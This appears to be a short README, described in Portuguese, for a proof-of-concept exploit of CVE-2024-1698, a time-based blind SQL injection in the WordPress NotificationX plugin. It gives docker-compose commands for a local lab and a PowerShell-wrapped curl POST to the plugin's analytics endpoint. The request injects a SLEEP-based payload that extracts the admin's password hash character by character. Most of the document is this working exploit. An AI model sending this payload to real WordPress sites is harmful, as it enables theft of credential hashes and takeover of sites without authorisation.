
Exploit de prova de conceito para CVE-2024-1698, uma vulnerabilidade de injeção SQL cega no plugin NotificationX do WordPress, permitindo extração de dados baseada em tempo do banco de dados.
docker-compose up --build
docker-compose down
Measure-Command {
curl.exe http://localhost/wp-json/notificationx/v1/analytics `
-Method Post `
-Body 'nx_id=1337&type=clicks`=IF(ASCII(SUBSTRING((select user_pass from wp_users where id=1),1,1))=36,SLEEP(10),null)-- -'
}